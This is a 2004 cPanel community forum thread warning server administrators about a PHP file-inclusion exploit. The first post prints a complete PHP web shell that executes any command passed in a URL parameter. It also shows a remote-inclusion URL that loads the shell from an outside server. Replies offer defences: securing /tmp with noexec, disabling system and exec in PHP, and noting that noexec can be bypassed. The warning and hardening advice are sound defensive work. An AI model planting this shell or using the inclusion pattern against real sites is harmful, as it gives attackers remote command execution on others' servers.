The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Secure your /tmp partitions!

Discussion in 'General Discussion' started by amdmachine, Mar 15, 2004.

  1. amdmachine

    amdmachine Member

    Joined:
    Feb 20, 2003
    Messages:
    17
    Likes Received:
    0
    Trophy Points:
    1
    Secure your /tmp and /var/tmp partitions people. Seems like a php injection exploit is now floating around which is very easy to use and exploit on a website that allows php files to be called locally.

    Code: hack.php
    Code:
    <br><font face="verdana" size="2"><center><bCOMMAND BUG PHP EXPLOIT !!</b><br></center></font><font face="Verdana" size="1"></center><br>
    <b>#</b> COMMAND BUG PHP EXPLOIT !!: <br>
    <b>#</b>Created By : <b>F4lcon16</b><br>
    <br>#</b>Email: <b>F4lcon16@linuxmail.org</b><br>
    <br>
    <hr color="black" width=751px height=115px>
    <br>
    <pre><font face="Verdana" size="1">
    <?
      // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
      if (isset($chdir)) @chdir($chdir);
      ob_start();
      system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
      $output = ob_get_contents();
      ob_end_clean();
      if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
    ?>
    </font></pre>
    <br>
    <hr color="black" width=751px height=115px>
    <br>
    <font face="Verdana" size="1"><b># F4lcon16</b><br><b>@ </b>f4lcon16@linuxmail.org<br><b># </b>
    It's called remotely like this:
    Code:
    http://yoursite.onyourserver.com/index.php=http://remote.server.com/hack.php?&cmd=shell%20commands%20here
    A correctly configured partition setup (not allowing executive permissions on /tmp) will stop scripts for being executed.
     
  2. nickn

    nickn Well-Known Member
    PartnerNOC

    Joined:
    Jun 15, 2003
    Messages:
    619
    Likes Received:
    1
    Trophy Points:
    18
    Just for those who aren't sure how...

    With cPanel it's as easy as running /scripts/securetmp
     
  3. InternetPEI

    InternetPEI Well-Known Member

    Joined:
    May 26, 2003
    Messages:
    102
    Likes Received:
    0
    Trophy Points:
    16
    Thanks :)
     
  4. Jeewhizz

    Jeewhizz Well-Known Member

    Joined:
    Mar 12, 2003
    Messages:
    51
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    London, England
    You should also be disabling certina functions like system and exec in php as default ;)
     
  5. hostultra

    hostultra Well-Known Member

    Joined:
    Aug 21, 2002
    Messages:
    167
    Likes Received:
    0
    Trophy Points:
    16
    The noexec thing on /tmp does mean you are invulnerable
    They can still run "sh /tmp/whatever" and it will execute
     
  6. nickn

    nickn Well-Known Member
    PartnerNOC

    Joined:
    Jun 15, 2003
    Messages:
    619
    Likes Received:
    1
    Trophy Points:
    18
    It's not perfect, but it's better than nothing.
     
Loading...

Share This Page